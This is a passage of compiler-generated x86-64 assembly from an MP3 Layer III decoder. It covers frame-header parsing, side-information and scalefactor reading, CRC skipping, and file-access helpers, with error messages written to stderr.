0[0+rax*4] lea rax, g_side_info[rip+8] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -20[rbp], 1 .L47: cmp DWORD PTR -20[rbp], 2 jbe .L48 mov edx, DWORD PTR -36[rbp] mov eax, DWORD PTR -32[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 2 jne .L49 mov edx, DWORD PTR -36[rbp] mov eax, DWORD PTR -32[rbp] add rax, rax add rax, rdx add rax, 32 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax jne .L49 mov edx, DWORD PTR -36[rbp] mov eax, DWORD PTR -32[rbp] add rax, rax add rax, rdx add rax, 60 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov DWORD PTR [rdx+rax], 8 jmp .L50 .L49: mov edx, DWORD PTR -36[rbp] mov eax, DWORD PTR -32[rbp] add rax, rax add rax, rdx add rax, 60 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov DWORD PTR [rdx+rax], 7 .L50: mov edx, DWORD PTR -36[rbp] mov eax, DWORD PTR -32[rbp] add rax, rax add rax, rdx add rax, 60 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] mov edx, 20 mov ecx, edx sub ecx, eax mov edx, DWORD PTR -36[rbp] mov eax, DWORD PTR -32[rbp] add rax, rax add rax, rdx add rax, 64 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov DWORD PTR [rdx+rax], ecx jmp .L51 .L44: mov DWORD PTR -24[rbp], 0 jmp .L52 .L53: mov edi, 5 call Get_Side_Bits mov ecx, eax mov edi, DWORD PTR -24[rbp] mov edx, DWORD PTR -32[rbp] mov esi, DWORD PTR -36[rbp] mov rax, rdx add rax, rax add rax, rdx add rax, rax mov rdx, rsi add rdx, rdx add rdx, rsi add rax, rdx add rax, rdi add rax, 36 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -24[rbp], 1 .L52: cmp DWORD PTR -24[rbp], 2 jbe .L53 mov edi, 4 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 60 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edi, 3 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 64 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edx, DWORD PTR -36[rbp] mov eax, DWORD PTR -32[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov DWORD PTR [rdx+rax], 0 .L51: mov edi, 1 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 68 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edi, 1 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 72 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax mov edi, 1 call Get_Side_Bits mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -32[rbp] add rdx, rdx add rdx, rcx add rdx, 76 lea rcx, 0[0+rdx*4] lea rdx, g_side_info[rip+8] mov DWORD PTR [rcx+rdx], eax add DWORD PTR -36[rbp], 1 .L43: mov eax, DWORD PTR -36[rbp] cmp eax, DWORD PTR -16[rbp] jb .L54 add DWORD PTR -32[rbp], 1 .L42: cmp DWORD PTR -32[rbp], 1 jbe .L55 mov eax, 0 .L31: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE10: .size Read_Audio_L3, .-Read_Audio_L3 .type Read_CRC, @function Read_CRC: .LFB11: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 call Get_Byte cmp eax, -1 je .L57 call Get_Byte cmp eax, -1 jne .L58 .L57: mov eax, 0 jmp .L59 .L58: mov eax, 0 .L59: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE11: .size Read_CRC, .-Read_CRC .section .rodata .align 8 .LC4: .string "Only layer 3(!= %d) is supported!\n" .text .type Read_Frame, @function Read_Frame: .LFB12: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov DWORD PTR -4[rbp], 0 call Get_Filepos test eax, eax jne .L61 call Decode_L3_Init_Song .L61: call Read_Header test eax, eax je .L62 mov eax, -1 jmp .L63 .L62: mov eax, DWORD PTR g_frame_header[rip+8] test eax, eax jne .L64 call Read_CRC test eax, eax je .L64 mov eax, -1 jmp .L63 .L64: mov eax, DWORD PTR g_frame_header[rip+4] cmp eax, 3 jne .L65 call Read_Audio_L3 call Read_Main_L3 test eax, eax je .L66 mov eax, -1 jmp .L63 .L65: mov edx, DWORD PTR g_frame_header[rip+4] mov rax, QWORD PTR stderr[rip] lea rsi, .LC4[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov eax, -1 jmp .L63 .L66: mov eax, 0 .L63: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE12: .size Read_Frame, .-Read_Frame .section .rodata .align 8 .LC5: .string "ID must be 1\nHeader word is 0x%08x at file pos %d\n" .align 8 .LC6: .string "Free bitrate format NIY!\nHeader word is 0x%08x at file pos %d\n" .align 8 .LC7: .string "bitrate_index = 15 is invalid!\nHeader word is 0x%08x at file pos %d\n" .align 8 .LC8: .string "sampling_frequency = 3 is invalid!\n" .align 8 .LC9: .string "Header word is 0x%08x at file pos %d\n" .LC10: .string "layer = 0 is invalid!\n" .text .type Read_Header, @function Read_Header: .LFB13: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 call Get_Byte mov DWORD PTR -4[rbp], eax call Get_Byte mov DWORD PTR -20[rbp], eax call Get_Byte mov DWORD PTR -16[rbp], eax call Get_Byte mov DWORD PTR -12[rbp], eax cmp DWORD PTR -4[rbp], -1 je .L68 cmp DWORD PTR -20[rbp], -1 je .L68 cmp DWORD PTR -16[rbp], -1 je .L68 cmp DWORD PTR -12[rbp], -1 jne .L69 .L68: mov eax, -1 jmp .L70 .L69: mov eax, DWORD PTR -4[rbp] sal eax, 24 mov edx, eax mov eax, DWORD PTR -20[rbp] sal eax, 16 or edx, eax mov eax, DWORD PTR -16[rbp] sal eax, 8 or eax, edx or eax, DWORD PTR -12[rbp] mov DWORD PTR -8[rbp], eax jmp .L71 .L73: mov eax, DWORD PTR -20[rbp] mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -16[rbp] mov DWORD PTR -20[rbp], eax mov eax, DWORD PTR -12[rbp] mov DWORD PTR -16[rbp], eax call Get_Byte mov DWORD PTR -12[rbp], eax cmp DWORD PTR -12[rbp], -1 jne .L72 mov eax, -1 jmp .L70 .L72: mov eax, DWORD PTR -4[rbp] sal eax, 24 mov edx, eax mov eax, DWORD PTR -20[rbp] sal eax, 16 or edx, eax mov eax, DWORD PTR -16[rbp] sal eax, 8 or eax, edx or eax, DWORD PTR -12[rbp] mov DWORD PTR -8[rbp], eax .L71: mov eax, DWORD PTR -8[rbp] and eax, -1048576 cmp eax, -1048576 jne .L73 mov eax, DWORD PTR -8[rbp] shr eax, 19 and eax, 1 mov DWORD PTR g_frame_header[rip], eax mov eax, DWORD PTR -8[rbp] shr eax, 17 and eax, 3 mov DWORD PTR g_frame_header[rip+4], eax mov eax, DWORD PTR -8[rbp] shr eax, 16 and eax, 1 mov DWORD PTR g_frame_header[rip+8], eax mov eax, DWORD PTR -8[rbp] shr eax, 12 and eax, 15 mov DWORD PTR g_frame_header[rip+12], eax mov eax, DWORD PTR -8[rbp] shr eax, 10 and eax, 3 mov DWORD PTR g_frame_header[rip+16], eax mov eax, DWORD PTR -8[rbp] shr eax, 9 and eax, 1 mov DWORD PTR g_frame_header[rip+20], eax mov eax, DWORD PTR -8[rbp] shr eax, 8 and eax, 1 mov DWORD PTR g_frame_header[rip+24], eax mov eax, DWORD PTR -8[rbp] shr eax, 6 and eax, 3 mov DWORD PTR g_frame_header[rip+28], eax mov eax, DWORD PTR -8[rbp] shr eax, 4 and eax, 3 mov DWORD PTR g_frame_header[rip+32], eax mov eax, DWORD PTR -8[rbp] shr eax, 3 and eax, 1 mov DWORD PTR g_frame_header[rip+36], eax mov eax, DWORD PTR -8[rbp] shr eax, 2 and eax, 1 mov DWORD PTR g_frame_header[rip+40], eax mov eax, DWORD PTR -8[rbp] and eax, 3 mov DWORD PTR g_frame_header[rip+44], eax mov eax, DWORD PTR g_frame_header[rip] cmp eax, 1 je .L74 call Get_Filepos mov ecx, eax mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -8[rbp] lea rsi, .LC5[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov eax, -1 jmp .L70 .L74: mov eax, DWORD PTR g_frame_header[rip+12] test eax, eax jne .L75 call Get_Filepos mov ecx, eax mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -8[rbp] lea rsi, .LC6[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov edi, 1 call exit@PLT .L75: mov eax, DWORD PTR g_frame_header[rip+12] cmp eax, 15 jne .L76 call Get_Filepos mov ecx, eax mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -8[rbp] lea rsi, .LC7[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov eax, -1 jmp .L70 .L76: mov eax, DWORD PTR g_frame_header[rip+16] cmp eax, 3 jne .L77 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 35 mov esi, 1 lea rdi, .LC8[rip] call fwrite@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT call Get_Filepos mov ecx, eax mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -8[rbp] lea rsi, .LC9[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov eax, -1 jmp .L70 .L77: mov eax, DWORD PTR g_frame_header[rip+4] test eax, eax jne .L78 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 22 mov esi, 1 lea rdi, .LC10[rip] call fwrite@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT call Get_Filepos mov ecx, eax mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -8[rbp] lea rsi, .LC9[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov eax, -1 jmp .L70 .L78: mov edx, DWORD PTR g_frame_header[rip+4] mov eax, 4 sub eax, edx mov DWORD PTR g_frame_header[rip+4], eax mov eax, 0 .L70: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE13: .size Read_Header, .-Read_Header .type Read_Main_L3, @function Read_Main_L3: .LFB14: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov eax, DWORD PTR g_frame_header[rip+28] cmp eax, 3 jne .L80 mov eax, 1 jmp .L81 .L80: mov eax, 2 .L81: mov DWORD PTR -28[rbp], eax mov eax, DWORD PTR g_frame_header[rip+4] lea edx, -1[rax] mov eax, DWORD PTR g_frame_header[rip+12] mov ecx, eax mov edx, edx mov rax, rdx sal rax, 4 sub rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_mpeg1_bitrates[rip] mov edx, DWORD PTR [rdx+rax] mov eax, edx sal eax, 3 add eax, edx sal eax, 4 mov ecx, eax mov eax, DWORD PTR g_frame_header[rip+16] mov eax, eax lea rdx, 0[0+rax*4] lea rax, g_sampling_frequency[rip] mov edi, DWORD PTR [rdx+rax] mov eax, ecx mov edx, 0 div edi mov edx, eax mov eax, DWORD PTR g_frame_header[rip+20] add eax, edx mov DWORD PTR -24[rbp], eax cmp DWORD PTR -24[rbp], 2000 jbe .L82 mov rax, QWORD PTR stderr[rip] mov edx, DWORD PTR -24[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT mov eax, -1 jmp .L83 .L82: cmp DWORD PTR -28[rbp], 1 jne .L84 mov eax, 17 jmp .L85 .L84: mov eax, 32 .L85: mov DWORD PTR -20[rbp], eax mov eax, DWORD PTR -24[rbp] sub eax, DWORD PTR -20[rbp] sub eax, 4 mov DWORD PTR -48[rbp], eax mov eax, DWORD PTR g_frame_header[rip+8] test eax, eax jne .L86 sub DWORD PTR -48[rbp], 2 .L86: mov edx, DWORD PTR g_side_info[rip] mov eax, DWORD PTR -48[rbp] mov esi, edx mov edi, eax call Get_Main_Data test eax, eax je .L87 mov eax, -1 jmp .L83 .L87: mov DWORD PTR -44[rbp], 0 jmp .L88 .L136: mov DWORD PTR -40[rbp], 0 jmp .L89 .L135: call Get_Main_Pos mov DWORD PTR -16[rbp], eax mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -44[rbp] add rax, rax add rax, rdx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] mov eax, eax lea rdx, 0[0+rax*8] lea rax, mpeg1_scalefac_sizes[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -12[rbp], eax mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -44[rbp] add rax, rax add rax, rdx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] mov eax, eax lea rdx, 0[0+rax*8] lea rax, mpeg1_scalefac_sizes[rip+4] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -8[rbp], eax mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -44[rbp] add rax, rax add rax, rdx add rax, 24 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L90 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -44[rbp] add rax, rax add rax, rdx add rax, 28 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 2 jne .L90 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -44[rbp] add rax, rax add rax, rdx add rax, 32 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L91 mov DWORD PTR -36[rbp], 0 jmp .L92 .L93: mov eax, DWORD PTR -12[rbp] mov edi, eax call Get_Main_Bits mov esi, eax mov edi, DWORD PTR -36[rbp] mov edx, DWORD PTR -44[rbp] mov ecx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rax mov rdx, rcx sal rdx, 2 add rdx, rcx sal rdx, 2 add rdx, rcx add rax, rdx add rax, rdi lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], esi add DWORD PTR -36[rbp], 1 .L92: cmp DWORD PTR -36[rbp], 7 jbe .L93 mov DWORD PTR -36[rbp], 3 jmp .L94 .L99: cmp DWORD PTR -36[rbp], 5 ja .L95 mov eax, DWORD PTR -12[rbp] jmp .L96 .L95: mov eax, DWORD PTR -8[rbp] .L96: mov DWORD PTR -4[rbp], eax mov DWORD PTR -32[rbp], 0 jmp .L97 .L98: mov eax, DWORD PTR -4[rbp] mov edi, eax call Get_Main_Bits mov ecx, eax mov r8d, DWORD PTR -32[rbp] mov edx, DWORD PTR -40[rbp] mov edi, DWORD PTR -36[rbp] mov esi, DWORD PTR -44[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 mov rdx, rdi add rdx, rdx add rdx, rdi add rdx, rax mov rax, rsi sal rax, 3 add rax, rsi sal rax, 3 add rax, rdx add rax, r8 add rax, 84 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -32[rbp], 1 .L97: cmp DWORD PTR -32[rbp], 2 jbe .L98 add DWORD PTR -36[rbp], 1 .L94: cmp DWORD PTR -36[rbp], 11 jbe .L99 jmp .L107 .L91: mov DWORD PTR -36[rbp], 0 jmp .L101 .L106: cmp DWORD PTR -36[rbp], 5 ja .L102 mov eax, DWORD PTR -12[rbp] jmp .L103 .L102: mov eax, DWORD PTR -8[rbp] .L103: mov DWORD PTR -4[rbp], eax mov DWORD PTR -32[rbp], 0 jmp .L104 .L105: mov eax, DWORD PTR -4[rbp] mov edi, eax call Get_Main_Bits mov ecx, eax mov r8d, DWORD PTR -32[rbp] mov edx, DWORD PTR -40[rbp] mov edi, DWORD PTR -36[rbp] mov esi, DWORD PTR -44[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 mov rdx, rdi add rdx, rdx add rdx, rdi add rdx, rax mov rax, rsi sal rax, 3 add rax, rsi sal rax, 3 add rax, rdx add rax, r8 add rax, 84 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -32[rbp], 1 .L104: cmp DWORD PTR -32[rbp], 2 jbe .L105 add DWORD PTR -36[rbp], 1 .L101: cmp DWORD PTR -36[rbp], 11 jbe .L106 jmp .L107 .L90: mov eax, DWORD PTR -40[rbp] sal rax, 4 mov rdx, rax lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L108 cmp DWORD PTR -44[rbp], 0 jne .L109 .L108: mov DWORD PTR -36[rbp], 0 jmp .L110 .L111: mov eax, DWORD PTR -12[rbp] mov edi, eax call Get_Main_Bits mov esi, eax mov edi, DWORD PTR -36[rbp] mov edx, DWORD PTR -44[rbp] mov ecx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rax mov rdx, rcx sal rdx, 2 add rdx, rcx sal rdx, 2 add rdx, rcx add rax, rdx add rax, rdi lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], esi add DWORD PTR -36[rbp], 1 .L110: cmp DWORD PTR -36[rbp], 5 jbe .L111 jmp .L112 .L109: mov eax, DWORD PTR -40[rbp] sal rax, 4 mov rdx, rax lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L112 cmp DWORD PTR -44[rbp], 1 jne .L112 mov DWORD PTR -36[rbp], 0 jmp .L113 .L114: mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -36[rbp] mov edx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 42 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -36[rbp], 1 .L113: cmp DWORD PTR -36[rbp], 5 jbe .L114 .L112: mov eax, DWORD PTR -40[rbp] sal rax, 4 mov rdx, rax lea rax, g_side_info[rip+12] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L115 cmp DWORD PTR -44[rbp], 0 jne .L116 .L115: mov DWORD PTR -36[rbp], 6 jmp .L117 .L118: mov eax, DWORD PTR -12[rbp] mov edi, eax call Get_Main_Bits mov esi, eax mov edi, DWORD PTR -36[rbp] mov edx, DWORD PTR -44[rbp] mov ecx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rax mov rdx, rcx sal rdx, 2 add rdx, rcx sal rdx, 2 add rdx, rcx add rax, rdx add rax, rdi lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], esi add DWORD PTR -36[rbp], 1 .L117: cmp DWORD PTR -36[rbp], 10 jbe .L118 jmp .L119 .L116: mov eax, DWORD PTR -40[rbp] sal rax, 4 mov rdx, rax lea rax, g_side_info[rip+12] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L119 cmp DWORD PTR -44[rbp], 1 jne .L119 mov DWORD PTR -36[rbp], 6 jmp .L120 .L121: mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -36[rbp] mov edx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 42 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -36[rbp], 1 .L120: cmp DWORD PTR -36[rbp], 10 jbe .L121 .L119: mov eax, DWORD PTR -40[rbp] sal rax, 4 mov rdx, rax lea rax, g_side_info[rip+16] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L122 cmp DWORD PTR -44[rbp], 0 jne .L123 .L122: mov DWORD PTR -36[rbp], 11 jmp .L124 .L125: mov eax, DWORD PTR -8[rbp] mov edi, eax call Get_Main_Bits mov esi, eax mov edi, DWORD PTR -36[rbp] mov edx, DWORD PTR -44[rbp] mov ecx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rax mov rdx, rcx sal rdx, 2 add rdx, rcx sal rdx, 2 add rdx, rcx add rax, rdx add rax, rdi lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], esi add DWORD PTR -36[rbp], 1 .L124: cmp DWORD PTR -36[rbp], 15 jbe .L125 jmp .L126 .L123: mov eax, DWORD PTR -40[rbp] sal rax, 4 mov rdx, rax lea rax, g_side_info[rip+16] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L126 cmp DWORD PTR -44[rbp], 1 jne .L126 mov DWORD PTR -36[rbp], 11 jmp .L127 .L128: mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -36[rbp] mov edx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 42 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -36[rbp], 1 .L127: cmp DWORD PTR -36[rbp], 15 jbe .L128 .L126: mov eax, DWORD PTR -40[rbp] sal rax, 4 mov rdx, rax lea rax, g_side_info[rip+20] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L129 cmp DWORD PTR -44[rbp], 0 jne .L130 .L129: mov DWORD PTR -36[rbp], 16 jmp .L131 .L132: mov eax, DWORD PTR -8[rbp] mov edi, eax call Get_Main_Bits mov esi, eax mov edi, DWORD PTR -36[rbp] mov edx, DWORD PTR -44[rbp] mov ecx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rax mov rdx, rcx sal rdx, 2 add rdx, rcx sal rdx, 2 add rdx, rcx add rax, rdx add rax, rdi lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], esi add DWORD PTR -36[rbp], 1 .L131: cmp DWORD PTR -36[rbp], 20 jbe .L132 jmp .L107 .L130: mov eax, DWORD PTR -40[rbp] sal rax, 4 mov rdx, rax lea rax, g_side_info[rip+20] mov eax, DWORD PTR [rdx+rax] cmp eax, 1 jne .L107 cmp DWORD PTR -44[rbp], 1 jne .L107 mov DWORD PTR -36[rbp], 16 jmp .L133 .L134: mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -36[rbp] mov edx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 42 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov DWORD PTR [rdx+rax], ecx add DWORD PTR -36[rbp], 1 .L133: cmp DWORD PTR -36[rbp], 20 jbe .L134 .L107: mov edx, DWORD PTR -40[rbp] mov ecx, DWORD PTR -44[rbp] mov eax, DWORD PTR -16[rbp] mov esi, ecx mov edi, eax call Read_Huffman add DWORD PTR -40[rbp], 1 .L89: mov eax, DWORD PTR -40[rbp] cmp eax, DWORD PTR -28[rbp] jb .L135 add DWORD PTR -44[rbp], 1 .L88: cmp DWORD PTR -44[rbp], 1 jbe .L136 mov eax, 0 .L83: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE14: .size Read_Main_L3, .-Read_Main_L3 .type Set_Main_Pos, @function Set_Main_Pos: .LFB15: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -4[rbp], edi mov eax, DWORD PTR -4[rbp] shr eax, 3 mov eax, eax lea rdx, 0[0+rax*4] lea rax, g_main_data_vec[rip] add rax, rdx mov QWORD PTR g_main_data_ptr[rip], rax mov eax, DWORD PTR -4[rbp] and eax, 7 mov DWORD PTR g_main_data_idx[rip], eax mov eax, 0 pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE15: .size Set_Main_Pos, .-Set_Main_Pos .section .rodata .LC11: .string "-" .LC12: .string "r" .LC13: .string "Cannot open file\n" .text .type Get_Byte, @function Get_Byte: .LFB16: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov rax, QWORD PTR fp[rip] test rax, rax jne .L140 mov rax, QWORD PTR filename[rip] test rax, rax je .L140 mov rax, QWORD PTR filename[rip] lea rsi, .LC11[rip] mov rdi, rax call strcmp@PLT test eax, eax jne .L141 mov rax, QWORD PTR stdin[rip] mov QWORD PTR fp[rip], rax mov rax, QWORD PTR fp[rip] test rax, rax jne .L140 .L141: mov rax, QWORD PTR filename[rip] lea rsi, .LC12[rip] mov rdi, rax call fopen@PLT mov QWORD PTR fp[rip], rax mov rax, QWORD PTR fp[rip] test rax, rax jne .L140 mov esi, 0 lea rdi, .LC13[rip] call Error .L140: mov rax, QWORD PTR fp[rip] mov rdi, rax call fgetc@PLT and eax, 255 mov DWORD PTR -4[rbp], eax mov rax, QWORD PTR fp[rip] mov rdi, rax call feof@PLT test eax, eax je .L142 mov DWORD PTR -4[rbp], -1 .L142: mov eax, DWORD PTR -4[rbp] leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE16: .size Get_Byte, .-Get_Byte .type Get_Filepos, @function Get_Filepos: .LFB17: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov rax, QWORD PTR fp[rip] test rax, rax jne .L145 mov eax, 0 jmp .L146 .L145: mov rax, QWORD PTR fp[rip] mov rdi, rax call feof@PLT test eax, eax je .L147 mov eax, -1 jmp .L146 .L147: mov rax, QWORD PTR fp[rip] mov rdi, rax call ftell@PLT .L146: pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE17: .size Get_Filepos, .-Get_Filepos .type Get_Filesize, @function Get_Filesize: .LFB18: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov rax, QWORD PTR fp[rip] test rax, rax jne .L149 mov eax, 0 jmp .L150 .L149: call Get_Filepos mov DWORD PTR -8[rbp], eax mov rax, QWORD PTR fp[rip] mov edx, 2 mov esi, 0 mov rdi, rax call fseek@PLT mov rax, QWORD PTR fp[rip] mov rdi, rax call ftell@PLT mov DWORD PTR -4[rbp], eax mov eax, DWORD PTR -8[rbp] mov edi, eax call Set_Filepos mov eax, DWORD PTR -4[rbp] .L150: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE18: .size Get_Filesize, .-Get_Filesize .globl Close_File .type Close_File, @function Close_File: .LFB19: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 